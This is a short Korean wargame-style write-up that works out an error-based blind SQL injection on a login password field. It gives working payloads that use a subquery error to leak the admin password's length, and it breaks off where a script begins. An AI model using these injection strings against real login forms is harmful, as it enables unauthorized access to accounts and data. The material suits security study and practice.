pw에 ' 를 넣어주면 오류가 발생한다. 아마도 error base sql injection이라고 생각된다. 문법 정리 (select 1 union select 2) (서브쿼리는 하나의 레코드를 반환해야하는데, 해당 쿼리의 결과는 2개의 레코드를 반환하기 때문에 에러가난다.) if ( 조건문, 참일때 값, 거짓일때 값) pw= '' or id='admin' and if(length(pw)=N, True, (select 1 union select 2))# length(pw)=N가 참이면 에러, 아니면 정상출력 pw= '' or id='admin' and if(length(pw)=32, True, (select 1 union select 2))# --> 에러 출력 --> length(pw)는 32 impor..